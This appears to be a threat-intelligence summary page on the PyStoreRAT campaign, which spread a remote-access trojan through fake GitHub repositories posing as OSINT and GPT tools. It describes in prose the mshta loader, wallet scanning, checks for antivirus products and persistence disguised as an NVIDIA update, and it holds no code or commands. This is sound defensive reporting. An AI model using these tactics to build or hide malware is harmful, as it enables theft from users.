PyStoreRAT Malware Distributed via Fake GitHub Repositories

Timeline

1. 12.12.2025 20:50 1 articles · 23h ago

   PyStoreRAT Malware Campaign Active Since Mid-June 2025

   A new campaign distributing PyStoreRAT, a modular JavaScript-based RAT, has been active since mid-June 2025. The malware is spread through GitHub repositories themed as OSINT tools, DeFi bots, and GPT wrappers. The repositories contain minimal code to download and execute a remote HTA file, leading to system profiling, privilege checks, and cryptocurrency wallet file scanning. The threat actors use social media promotion and artificial metrics inflation to lend legitimacy to the repositories.

   Show sources

   • Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads — thehackernews.com — 12.12.2025 20:50

   Open in new tab

Information Snippets

• PyStoreRAT is a modular, multi-stage implant capable of executing various payload formats including EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA.

  First reported: 12.12.2025 20:50
  1 source, 1 article
  Show sources

  • Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads — thehackernews.com — 12.12.2025 20:50

• The malware is distributed through GitHub repositories themed as development utilities or OSINT tools, containing minimal code to download and execute a remote HTA file via 'mshta.exe'.

  First reported: 12.12.2025 20:50
  1 source, 1 article
  Show sources

  • Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads — thehackernews.com — 12.12.2025 20:50

• PyStoreRAT profiles the system, checks for administrator privileges, and scans for cryptocurrency wallet-related files associated with Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02.

  First reported: 12.12.2025 20:50
  1 source, 1 article
  Show sources

  • Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads — thehackernews.com — 12.12.2025 20:50

• The loader stub checks for installed antivirus products, particularly those matching 'Falcon' (CrowdStrike Falcon) or 'Reason' (Cybereason or ReasonLabs), to reduce visibility.

  First reported: 12.12.2025 20:50
  1 source, 1 article
  Show sources

  • Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads — thehackernews.com — 12.12.2025 20:50

• Persistence is achieved by setting up a scheduled task disguised as an NVIDIA app self-update.

  First reported: 12.12.2025 20:50
  1 source, 1 article
  Show sources

  • Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads — thehackernews.com — 12.12.2025 20:50

• The malware contacts an external server to fetch and execute commands, including downloading and executing payloads, extracting ZIP archives, and spreading via removable drives.

  First reported: 12.12.2025 20:50
  1 source, 1 article
  Show sources

  • Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads — thehackernews.com — 12.12.2025 20:50

• The campaign has been active since mid-June 2025, with repositories promoted via social media and artificially inflated metrics.

  First reported: 12.12.2025 20:50
  1 source, 1 article
  Show sources

  • Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads — thehackernews.com — 12.12.2025 20:50

• The threat actors use newly created or dormant GitHub accounts to publish repositories and slip malicious payloads in 'maintenance' commits.

  First reported: 12.12.2025 20:50
  1 source, 1 article
  Show sources

  • Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads — thehackernews.com — 12.12.2025 20:50

• The presence of Russian-language artifacts suggests a likely Eastern European origin for the threat actors.

  First reported: 12.12.2025 20:50
  1 source, 1 article
  Show sources

  • Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads — thehackernews.com — 12.12.2025 20:50